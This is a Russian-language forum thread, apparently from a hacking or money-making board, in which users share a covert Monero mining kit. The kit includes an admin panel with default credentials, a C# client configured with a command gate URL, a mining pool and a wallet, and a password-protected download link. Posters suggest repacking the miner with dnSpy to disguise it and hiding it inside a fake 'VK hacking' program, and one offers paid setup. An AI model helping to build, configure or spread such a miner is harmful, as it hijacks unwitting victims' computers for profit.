$dblocation = "localhost"; // Имя серверанастройки менять
Что в этой строке писать, перепробовал все, думаю здесь ошибка у меня, примерно как должна выглядеть эта строка?????
Follow along with the video below to see how to install our site as a web app on your home screen.
Примечание: This feature currently requires accessing the site using the built-in Safari browser.
$dblocation = "localhost"; // Имя серверанастройки менять
настройки хостинга, а не скрипта. В большинстве случаев локалхост правильный вариант$dblocation = "localhost"; // Имя сервера
Что в этой строке писать, перепробовал все, думаю здесь ошибка у меня, примерно как должна выглядеть эта строка?????
Понял, спасибо)настройки хостинга, а не скрипта. В большинстве случаев локалхост правильный вариант
Пиши в телегу @rektboyКто поможет розобраться с сайтом?
Почему когда я хочу импортировать файлы архива у меня запрашивают пароль и сайт с настройками папки source временно не доступен?Web часть:
1. Импортируйте в phpmyadmin "adminka.sql"
2. Настройте файл "config.php"
3. Залейте все файлы на хост
4. Перейдите на index.php (admin:admin)
(Логин и пароль меняется в phpmyadmin в колонке "userinfo")
Source:
1. Все настройки находятся тут:
private static string adm = "http://site.ru/cmd.php"; //Gate
private static string loggr = "a";
private static string pool = "stratum+tcp://xmr.pool.minergate.com:45560"; //Пул
private static string u = "wallet"; //Кошелёк
скачать можно тут: https://yadi.sk/d/haFsPnHF3RJgGB
Пароль от архива у вас в адресной строке (думаю догадаетесь)
Так же могу сделать майнер для тех кто не понимает что и как делать за символическиймиллион рублей50р (писать в телеграмм @areott или в лс на форуме)
2. Рекомендуется изменить саму оболочку майнера в ресурасах через dnSpy:
![]()
Проверил. Все равботает и требует лишь 1 пароль от архива, который указан в темеПочему когда я хочу импортировать файлы архива у меня запрашивают пароль и сайт с настройками папки source временно не доступен?
каждый кто запускает этот файл майнит тебе.Этим манингом сам зарабатываеш или можно кого то привлекать и они тебе будут зарабатывать?
Сколько таким образом можно заработать?
А можна как то этот файл поместить в программу (взлом вк) ?каждый кто запускает этот файл майнит тебе.
Телеграмм - @areottпомги мне с майнингом, вот мой вк
Я бы на вашем месте брал бы с них деньги за помощь, а то вообще разленились, уже инфу по установке и настройке чего либо им влом поискать и почитать. Детский сад. Никого не хотел обидеть.Телеграмм - @areott